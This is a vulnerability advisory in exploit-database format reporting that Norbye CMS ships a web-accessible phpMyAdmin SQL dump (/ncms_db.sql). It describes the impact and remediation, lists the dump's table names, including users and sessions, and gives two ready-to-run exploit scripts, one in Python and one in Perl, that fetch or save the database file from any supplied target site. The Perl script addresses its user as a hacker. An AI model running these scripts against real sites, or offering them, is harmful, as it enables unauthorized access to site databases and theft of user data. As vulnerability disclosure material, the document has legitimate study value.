###########################################################################
# Exploit Title : Norbye CMS Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/04/2019
# Vendor Homepage : cms.norbye.com
# Software Download Link : github.com/norbye/CMS/archive/master.zip
# Software Information Link : github.com/norbye/CMS
# Software Version : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/
###########################################################################
# Information about Software :
****************************
Norbye CMS is a Content Management System designed to ease the administration of a
website, and also make it as simple as possible for the developer.
Features of NCMS
Simple editing of static page content and database content
Isolated design sheets (HTML, CSS and JavaScript)
Support for running multiple sites from the same files, multiple domains per site
Configure special methods for each site with ease
Setup the administration panel with ease
Full freedom to the developer
Built on PHP and mySQL
###########################################################################
# Impact :
***********
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information
to an actor that is not explicitly authorized to have access to that information.
* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
MySQL over the World Wide Web. It can be used to dump a database or a collection of
databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both.
This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
should not be found on a production system.
* It looks like this file contains a database backup/dump.
Acunetix inferred this filename from the domain name. A database backup contains a record of the
table structure and/or the data from a database and is usually in the form of a list of SQL statements.
A database backup is most often used for backing up a database so that its contents can be restored
in the event of data loss. This information is highly sensitive and should never be found on a production system.
Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible
to the web server. As a workaround, you could restrict access to this file.
Functionality =>
Edit static pages in-page to be able to se the results as they would be on the real site
Very user-friendly administration panel
Easy to use for the developer as it is pure PHP and JavaScript, and allows HTML and
CSS templates with simple formatting codes to style allow dynamic page content loading.
Permission system for the site-administrators
(permission to view/edit/delete/create tables/rows, integer-based)
Default functions to add custom pages to the administration panel
###########################################################################
File :
******
/ncms_db.sql
Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.15.8
-- phpmyadmin.net
--
-- Host: localhost
-- Generation Time: 03. Des, 2016 13:04 PM
-- Server-versjon: 5.5.50-MariaDB
-- PHP Version: 5.4.16
-- Database: `ncms_db`
-- Tabellstruktur for tabell `ncms_Clients`
-- Dataark for tabell `ncms_Clients`
-- Tabellstruktur for tabell `ncms_Globalroles`
-- Dataark for tabell `ncms_Globalroles`
-- Tabellstruktur for tabell `ncms_Languages`
-- Dataark for tabell `ncms_Languages`
-- Tabellstruktur for tabell `ncms_Pages`
-- Tabellstruktur for tabell `ncms_Roles`
-- Dataark for tabell `ncms_Roles`
-- Tabellstruktur for tabell `ncms_Sessions`
-- Tabellstruktur for tabell `ncms_Strings`
-- Tabellstruktur for tabell `ncms_URLs`
-- Dataark for tabell `ncms_URLs`
-- Tabellstruktur for tabell `ncms_Users`
-- Dataark for tabell `ncms_Users`
-- Tabellstruktur for tabell `ncms_Users_Globalroles`
-- Dataark for tabell `ncms_Users_Globalroles`
-- Indexes for dumped tables
-- Dump Completed.
raw.githubusercontent.com/norbye/CMS/master/ncms_db.sql
###########################################################################
# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/ncms_db.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit
###########################################################################
# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('Norbye CMS Database Disclosure Exploit');
system('color a');
if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;
$File="ncms_db.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/ncms_db.sql");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/ncms_db.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################